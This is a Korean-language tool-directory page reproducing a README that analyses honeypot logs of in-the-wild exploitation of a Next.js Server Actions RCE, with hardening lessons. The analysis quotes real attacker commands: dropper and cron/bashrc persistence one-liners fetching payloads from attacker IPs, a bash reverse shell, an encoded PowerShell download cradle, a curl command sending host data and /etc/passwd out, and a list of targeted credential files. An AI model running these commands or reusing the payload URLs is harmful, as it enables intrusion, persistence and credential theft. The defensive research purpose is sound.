Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-66478 — 실제 CVE-2025-66478 (Next.js Server Actions RCE) 공격 로그 분석과 악성코드 샘플, 공격자 IP 추적, 컨테이너 보안 강화 교훈. | Kitploit
도구/GitHubGitHub/exptechtw/cve-2025-66478
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationForensicsMalware AnalysisThreat IntelligenceLearning & EducationIncident Response
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

실제 CVE-2025-66478 (Next.js Server Actions RCE) 공격 로그 분석과 악성코드 샘플, 공격자 IP 추적, 컨테이너 보안 강화 교훈.

28개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2025-66478 - Next.js Server Actions RCE 취약점 실제 공격 로그 분석

개요

이 프로젝트는 인터넷에 노출된 Next.js 15.1.2 애플리케이션(Docker 컨테이너에서 실행)이 기록한 실제 공격 로그를 수집했습니다. 이 로그들은 CVE-2025-66478 취약점이 야생에서 대규모 자동화 공격 도구에 의해 스캔되고 악용되는 상황을 보여줍니다.

기록 시간 범위: 2025-12-04 ~ 2025-12-06 (약 48시간)

환경 정보:

  • 프레임워크: Next.js 15.1.2
  • 실행 환경: Bun v1.2.20
  • 컨테이너: Docker (Alpine Linux)
  • 시간대: Asia/Taipei

공격 유형 통계

1. 악성 프로그램 다운로드 및 실행 (Dropper/Downloader)

공격자는 취약점을 통해 악성 프로그램을 다운로드하고 실행하는 명령어를 실행하려고 시도했습니다.

공격 소스 IP악성 페이로드 URL설명
216.158.232.43http://216.158.232.43:12000/sex.sh좀비 네트워크/채굴 프로그램
38.207.161.212http://38.207.161.212/agent악성 agent 프로그램
43.156.63.124http://43.156.63.124/tsdcron 백도어 삽입
154.38.121.219res.qiqigece.top/nginx3nginx로 위장한 악성 프로그램
47.79.42.91iot.632313373.xyz/nz.shIoT 좀비 네트워크 스크립트
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.sh채굴/백도어 프로그램
103.135.101.15http://103.135.101.15/wocaosinm.sh악성 스크립트
38.12.24.231http://38.12.24.231/kworkerkernel worker로 위장한 악성 프로그램
128.199.194.97http://128.199.194.97:9001/setup2.sh초기화 스크립트

공격 명령어 예시

root@kitploit:~
# 일반적인 dropper 공격
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# cron 지속성 백도어 삽입
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# 복잡한 지속성 공격 (여러 다운로드 방식 시도 + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. 리버스 쉘 (Reverse Shell)

공격자는 대화형 액세스를 얻기 위해 리버스 쉘 연결을 설정하려고 시도했습니다.

root@kitploit:~
# Bash 리버스 쉘
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell 공격 (Windows 대상 오판)

공격자는 대상이 Windows 시스템이라고 가정하고 PowerShell 명령어를 실행하려고 시도했습니다.

root@kitploit:~
# Base64로 인코딩된 악성 PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# 디코딩 결과:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# 취약점 확인을 위한 수학 계산
powershell -c "41*271"      # = 11111 (특징 코드 확인)
powershell -c "44225*41002" # = 1814113450

4. 정보 수집 (Information Gathering)

공격자는 후속 공격을 위해 시스템 정보를 수집하려고 시도했습니다.

root@kitploit:~
# 시스템 정보 수집 및 외부 전송
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. 자격 증명 탈취 (Credential Harvesting)

공격자는 다양한 민감한 파일과 자격 증명을 읽으려고 시도했습니다.

읽기를 시도한 민감한 경로

6. 환경 변수 유출

취약점을 통해 성공적으로 유출된 컨테이너 환경 변수:

root@kitploit:~
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS 유출 (DNS Exfiltration)

공격자는 DNS 쿼리를 사용하여 데이터를 유출하거나 취약점을 확인했습니다:

root@kitploit:~
ping 5a58e4a0.log.dnslog.pp.ua.

공격 실패 원인

대부분의 공격이 실패한 것은 Alpine Linux 컨테이너의 경량화 특성 때문입니다:

누락된 도구영향
curl악성 페이로드 다운로드 불가
bashbash 특수 문법 (리버스 쉘 등) 실행 불가
powershellWindows 공격 무효

wget은 사용 가능했지만, 일부 악성 스크립트 내부에서 여전히 curl 또는 bash에 의존하여 실행에 실패했습니다.


Base64 디코딩 예시

로그에는 다량의 Base64로 인코딩된 데이터가 포함되어 있으며, 다음은 일부 디코딩 결과입니다:

시스템 정보 유출

root@kitploit:~
# digest: 'cm9vdAo='
디코딩: root

# digest: 'dGVzdAo='
디코딩: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
디코딩: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
디코딩: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

디렉터리 목록 유출

root@kitploit:~
# /tmp 디렉터리 내용
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

디코딩:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

공격 소스 IP 통계

다음은 기록된 공격 소스 IP 주소입니다:


취약점 악용 방법 (Attack Vectors)

Server Action 호출

공격자는 존재하지 않는 Server Action을 호출하려고 시도했습니다:

root@kitploit:~
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"

오류 응답에서의 정보 유출

공격자는 오류 메시지의 digest 필드를 이용하여 데이터를 유출했습니다:

root@kitploit:~
Error: x
  digest: 'cm9vdAo='  // 'root'의 Base64 인코딩

교육 주요 포인트

1. 컨테이너 보안 모범 사례

  • 최소화된 이미지: 경량 기본 이미지(예: Alpine) 사용으로 공격 표면 감소
  • 불필요한 도구 제거: curl, bash, python 등 악용 가능성이 있는 도구 미설치
  • 읽기 전용 파일 시스템: --read-only 옵션으로 컨테이너 실행
  • 비-root 사용자: 권한이 없는 사용자로 애플리케이션 실행

2. 취약점 패치

  • Next.js를 패치된 버전으로 업그레이드
  • Server Action 입력 값 검증
  • 의심스러운 요청을 필터링하는 WAF 규칙 구현

3. 모니터링 및 탐지

  • 비정상적인 자식 프로세스 실행 모니터링
  • 네트워크 외부 연결 요청 모니터링
  • 민감한 파일 접근 시도 모니터링

면책 조항

본 프로젝트는 보안 교육 및 연구 목적으로만 제공됩니다. 기록된 모든 공격은 연구용 허니팟에 대한 실제 공격 시도입니다. 이 정보를 불법적인 목적으로 사용하지 마십시오.


악성 프로그램 샘플

본 프로젝트에는 공격 로그에서 추출하여 다운로드한 실제 악성 프로그램 샘플이 포함되어 있습니다. 자세한 분석은 다음을 참조하십시오:

malware_samples/ANALYSIS.md

획득한 샘플

공격 방법 요약

  1. nz.sh - 나즈하(Nezha) 모니터링 Agent 설치, 원격으로 피해 호스트 모니터링
  2. tsd.sh + tsd - 다중 지속성 메커니즘 생성 (cron + systemd + rc.local)
  3. init.sh + agent - 완전한 백도어 프레임워크, 다중 시스템 지원, 자동 재시작, 로그 기록

관련 리소스

  • Next.js Security Advisories
  • OWASP - Command Injection
  • MITRE ATT&CK - Execution

라이선스

MIT License

도구 다운로드
카테고리경로
클라우드 자격 증명/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH 키/root/.ssh/id_rsa, /root/.ssh/config
Git 자격 증명/root/.git-credentials, /root/.gitconfig
컨테이너/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
애플리케이션/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
쉘 히스토리/root/.bash_history, /root/.zsh_history
클라우드 도구/root/.ossutilconfig (阿里云 OSS)
/root/.npmrc
시스템 설정/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow
pythonPython 다운로더 사용 불가
IP 주소국가/지역 (추정)공격 유형
216.158.232.43미국Dropper
38.165.44.205미국Dropper
23.95.44.80미국Dropper
154.38.121.219홍콩Malware (nginx3)
38.207.161.212미국Agent
43.156.63.124중국Cron 백도어
47.79.42.91중국 (阿里云)IoT 좀비 네트워크
47.79.65.237중국 (阿里云)채굴 프로그램
119.45.243.154중국 (腾讯云)채굴 프로그램
144.22.210.54브라질Dropper
217.60.249.228스웨덴Dropper
154.26.192.32미국리버스 쉘
156.234.209.103알 수 없음PowerShell 페이로드
38.60.212.106미국정보 수집
103.135.101.15베트남좀비 네트워크
128.199.194.97싱가포르 (DigitalOcean)Setup 스크립트
38.12.24.231미국지속성 악성 프로그램
파일유형크기출처위협 수준
nz.shShell Script931 Biot.632313373.xyz중
tsd.shShell Script1.7 KB43.156.63.124고
tsdELF 64-bit6.8 MB43.156.63.124고
init.shShell Script6.1 KBAWS S3심각
agentELF 64-bit23.7 MBAWS S3심각
Agtisx.exePE32+ (Windows)24.0 MBAWS S3심각